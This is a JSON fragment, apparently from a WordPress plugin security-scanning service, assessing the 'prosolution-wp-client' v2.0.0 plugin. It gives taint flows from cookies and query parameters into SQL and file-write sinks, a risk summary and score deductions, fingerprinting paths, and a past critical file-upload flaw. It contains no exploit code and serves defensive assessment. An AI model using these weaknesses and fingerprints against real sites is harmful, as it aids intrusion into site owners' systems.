[SQLi]",392,"get_var",[1547],{"from":1334,"to":1339,"sanitized":49},"high",{"entryPoint":1550,"graph":1551,"unsanitizedCount":1570,"severity":1548},"\u003Cclass-prosolwpclient-table-helper> (includes\u002Fclass-prosolwpclient-table-helper.php:0)",{"nodes":1552,"edges":1565},[1553,1554,1555,1557,1558,1559,1560,1561],{"id":1334,"type":1335,"label":1359,"file":200,"line":1353},{"id":1339,"type":1340,"label":1355,"file":200,"line":420,"wp_function":1356},{"id":1358,"type":1335,"label":1556,"file":200,"line":1353},"$_COOKIE (x3)",{"id":1361,"type":1340,"label":1341,"file":200,"line":957,"wp_function":1343},{"id":1394,"type":1335,"label":1352,"file":200,"line":671},{"id":1397,"type":1340,"label":1543,"file":200,"line":1544,"wp_function":1545},{"id":1418,"type":1335,"label":1352,"file":200,"line":1353},{"id":1421,"type":1340,"label":1562,"file":200,"line":1563,"wp_function":1564},"file_put_contents() [File Write]",486,"file_put_contents",[1566,1567,1568,1569],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},7,{"entryPoint":1572,"graph":1573,"unsanitizedCount":161,"severity":1548},"\u003Cprosolwpclientjobdetails> (public\u002Ftemplates\u002Fprosolwpclientjobdetails.php:0)",{"nodes":1574,"edges":1579},[1575,1576,1577,1578],{"id":1334,"type":1335,"label":1391,"file":497,"line":1402},{"id":1339,"type":1340,"label":1543,"file":497,"line":746,"wp_function":1545},{"id":1358,"type":1335,"label":1412,"file":497,"line":767},{"id":1361,"type":1340,"label":1388,"file":497,"line":516,"wp_function":1389},[1580,1581],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"summary":1583,"deductions":1584},"The \"prosolution-wp-client\" v2.0.0 plugin exhibits a mixed security posture. On the positive side, it demonstrates good practices by utilizing prepared statements for all SQL queries and incorporates a significant number of nonce and capability checks. 
The static analysis also shows a relatively contained attack surface, with no entry points directly exposed without authentication checks.\n\nHowever, several concerning signals emerge from the code analysis. The presence of dangerous functions like `exec`, `move_uploaded_file`, `ini_set`, and `create_function`, especially when combined with a high number of unsanitized path flows identified in the taint analysis (11 out of 18), suggests potential for severe vulnerabilities. While no critical taint flows were explicitly flagged, three entry points are rated high, with unsanitized `$_COOKIE` and `$_GET` data reaching `get_var()` and `file_put_contents()` sinks, so those call sites should be checked against the prepared-statement finding above; the combination of these factors could easily lead to arbitrary file operations or code execution if not handled with extreme care. The output escaping percentage (71%) also leaves room for improvement and may leave XSS vulnerabilities in place.\n\nThe vulnerability history, though showing no currently unpatched CVEs, reveals a past critical vulnerability related to 'Unrestricted Upload of File with Dangerous Type'. This pattern, coupled with the identified dangerous functions and unsanitized path flows, suggests a recurring area of risk for this plugin. While the current version might be patched for past critical issues, the underlying code patterns indicate a persistent potential for such vulnerabilities to reappear. 
In conclusion, while the plugin has strengths in its database interaction and authentication checks, the presence of dangerous functions and a history of critical file upload vulnerabilities, coupled with unsanitized path flows, warrant careful scrutiny and a cautious approach to its deployment.",[1585,1588,1590,1592,1595],{"reason":1586,"points":1587},"Dangerous functions present (exec, move_uploaded_file, etc.)",15,{"reason":1589,"points":1587},"Unsanitized path flows in taint analysis (3 critical\u002Fhigh)",{"reason":1591,"points":143},"Output escaping only 71% proper",{"reason":1593,"points":1594},"Past critical vulnerability (Unrestricted Upload)",18,{"reason":1596,"points":1597},"File operations analysis high (47)",5,"2026-04-16T11:17:41.972Z",{"wat":1600,"direct":1613},{"assetPaths":1601,"generatorPatterns":1606,"scriptPaths":1607,"versionParams":1608},[1602,1603,1604,1605],"\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fcss\u002Fstyle.css","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fjs\u002Fscript.js","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fcss\u002Fadmin.css","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fjs\u002Fadmin.js",[],[1603],[1609,1610,1611,1612],"prosolution-wp-client\u002Fassets\u002Fcss\u002Fstyle.css?ver=","prosolution-wp-client\u002Fassets\u002Fjs\u002Fscript.js?ver=","prosolution-wp-client\u002Fassets\u002Fcss\u002Fadmin.css?ver=","prosolution-wp-client\u002Fassets\u002Fjs\u002Fadmin.js?ver=",{"cssClasses":1614,"htmlComments":1617,"htmlAttributes":1641,"restEndpoints":1643,"jsGlobals":1644,"shortcodeOutput":1646},[1615,1616],"prosolwpclient-settings-page","prosolwpclient-admin-form",[1618,1619,1620,1621,1622,1623,1624,1625,1626,1627,1628,1629,1630,1631,1632,1633,1634,1635,1636,1637,1638,1639,1640],"Plugin Name:       ProSolution WP Client","Plugin URI:        
https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html","Description:       WordPress client for ProSolution","Version:           2.0.0","Author:            ProSolution","Author URI:        https:\u002F\u002Fwww.prosolution.com","License:           GPL-2.0+","License URI:       http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.txt","Text Domain:       prosolwpclient","Domain Path:       \u002Flanguages","\u003C!-- Currently pligin version.","\u003C!-- Start at version 1.0.0 and use SemVer - https:\u002F\u002Fsemver.org","\u003C!-- Rename this for your plugin and update it as you release new versions.","\u003C!-- If this file is called directly, abort.","\u003C!-- Encrypt and decrypt","\u003C!-- Reference: https:\u002F\u002Fwww.geeksforgeeks.org\u002Fhow-to-encrypt-and-decrypt-a-php-string\u002F","\u003C!-- Filters a plugin's locale.","\u003C!-- Detect browser language.","\u003C!-- Use $_SERVER['HTTP_ACCEPT_LANGUAGE'] if no language variable is available","\u003C!-- Any info sent?","\u003C!-- Use random_bytes() function to generate a random initialization vector (iv)","\u003C!-- Alternatively, you can use a fixed iv if needed","\u003C!-- Use php_uname() as the encryption 
key",[1642],"data-prosolwpclient-nonce",[],[1645],"window.prosolwpclient_ajaxurl",[],{"slug":4,"current_version":6,"total_versions":1648,"versions":1649},2,[1650,1655],{"version":6,"download_url":25,"svn_tag_url":1651,"released_at":36,"has_diff":49,"diff_files_changed":1652,"diff_lines":36,"trac_diff_url":1653,"vulnerabilities":1654,"is_current":65},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fprosolution-wp-client\u002Ftags\u002F2.0.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fprosolution-wp-client%2Ftags%2F1.9.9&new_path=%2Fprosolution-wp-client%2Ftags%2F2.0.0",[],{"version":1656,"download_url":1657,"svn_tag_url":1658,"released_at":36,"has_diff":49,"diff_files_changed":1659,"diff_lines":36,"trac_diff_url":36,"vulnerabilities":1660,"is_current":49},"1.9.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprosolution-wp-client.1.9.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fprosolution-wp-client\u002Ftags\u002F1.9.9\u002F",[],[1661],{"id":32,"url_slug":33,"title":34,"severity":38,"cvss_score":39,"vuln_type":41,"patched_in_version":6}]